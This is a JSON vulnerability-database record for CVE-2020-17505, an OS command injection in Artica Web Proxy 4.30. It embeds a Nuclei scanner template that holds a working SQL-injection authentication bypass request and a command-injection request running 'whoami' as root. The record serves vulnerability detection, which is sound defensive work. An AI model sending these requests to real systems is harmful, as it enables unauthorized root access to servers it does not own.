{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2020-17505/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2020-17505/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2020-17505/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2020-17505/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2020-17505/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2020-17505"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2020-17505"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2020/CVE-2020-17505.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2020-17505\n\ninfo:\n  name: Artica Web Proxy 4.30 - OS Command Injection\n  author: dwisiswant0\n  severity: high\n  description: Artica Web Proxy 4.30 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform.\n  impact: |\n    Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected system.\n  remediation: |\n    Upgrade to a patched version of Artica Web Proxy or apply the vendor-supplied patch to mitigate this vulnerability.\n  reference:\n    - http://packetstormsecurity.com/files/159267/Artica-Proxy-4.30.000000-Authentication-Bypass-Command-Injection.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2020-17505\n    - https://blog.max0x4141.com/post/artica_proxy/\n    - https://github.com/sobinge/nuclei-templates\n    - https://github.com/ARPSyndicate/kenzer-templates\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.8\n    cve-id: CVE-2020-17505\n    cwe-id: CWE-78\n    epss-score: 0.82165\n    epss-percentile: 0.99641\n    cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:*\n  metadata:\n    max-request: 2\n    vendor: articatech\n    product: web_proxy\n  tags: cve,cve2020,proxy,packetstorm,rce,artica,articatech,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n      - |\n        GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"array(2)\"\n          - \"Position: ||whoami||\"\n          - \"root\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502200d6a934facb6e75167c5b10433ed7c095c129fdfe862a08c8c01b60655bae643022100bf8b733d43bf69d6a6f63b7b613033519349b51035ccf7bdf9b348878072af3c:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2020-17505"
}